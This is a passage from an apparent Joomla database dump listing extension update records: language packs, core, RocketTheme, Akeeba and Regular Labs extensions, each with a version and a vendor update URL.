Cyrillic','','pkg_sr-RS','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(19076,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(19077,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(19078,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(19079,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(19080,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(19081,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(19082,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(19083,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(19084,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(19085,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(19086,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(19087,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(19088,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(19089,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19090,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(19091,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(19092,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(19093,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(19094,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(19095,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(19096,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(19097,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(19098,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(19099,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(19100,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(19101,57,0,'French','','pkg_fr-FR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(19102,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(19103,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(19104,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(19105,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(19106,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(19107,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(19108,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(19109,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(19110,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(19111,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(19112,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(19113,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(19114,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(19115,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(19116,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(19117,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(19118,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(19119,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(19120,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(19121,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(19122,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(19123,57,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(19124,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(19125,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(19126,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(19127,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(19128,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(19129,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(19130,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(19131,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(19132,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(19133,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(19134,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(19135,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(19136,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(19137,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(19138,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(19139,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(19140,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(19141,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(19142,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(19143,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(19144,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(19145,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(19146,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(19147,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(19148,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(19149,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.0.13','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/download/fef/1-0-13.html',''),(19150,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.3.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(19151,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(19152,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19153,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(19154,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19155,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19156,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(19157,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(19158,3,0,'French','','pkg_fr-FR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(19159,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(19160,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(19161,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(19162,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(19163,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(19164,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(19165,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(19166,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(19167,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(19168,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(19169,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(19170,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(19171,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(19172,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(19173,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(19174,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(19175,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(19176,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(19177,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(19178,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(19179,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(19180,3,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(19181,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(19182,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(19183,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(19184,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(19185,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(19186,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(19187,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(19188,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(19189,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(19190,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(19191,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(19192,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(19193,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(19194,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(19195,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(19196,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(19197,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(19198,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(19199,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(19200,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(19201,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(19202,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(19203,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(19204,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(19205,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(19206,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(19207,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(19208,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(19209,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(19210,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(19211,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(19212,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(19213,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(19214,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(19215,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(19216,57,0,'French','','pkg_fr-FR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(19217,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(19218,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(19219,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(19220,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(19221,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(19222,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(19223,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(19224,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(19225,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(19226,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(19227,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(19228,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(19229,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(19230,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(19231,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(19232,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(19233,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(19234,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(19235,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(19236,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(19237,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(19238,57,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(19239,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(19240,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(19241,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(19242,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(19243,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(19244,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(19245,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(19246,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(19247,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(19248,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(19249,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(19250,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(19251,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(19252,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(19253,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(19254,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(19255,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(19256,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(19257,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(19258,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(19259,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(19260,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(19261,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(19262,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(19263,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(19264,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.0.13','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/download/fef/1-0-13.html',''),(19265,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.3.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(19266,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(19267,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19268,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19269,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(19270,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19271,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(19272,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(19273,3,0,'French','','pkg_fr-FR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(19274,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(19275,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(19276,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(19277,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(19278,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(19279,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(19280,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(19281,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(19282,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(19283,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(19284,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(19285,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(19286,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(19287,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(19288,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(19289,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fa-I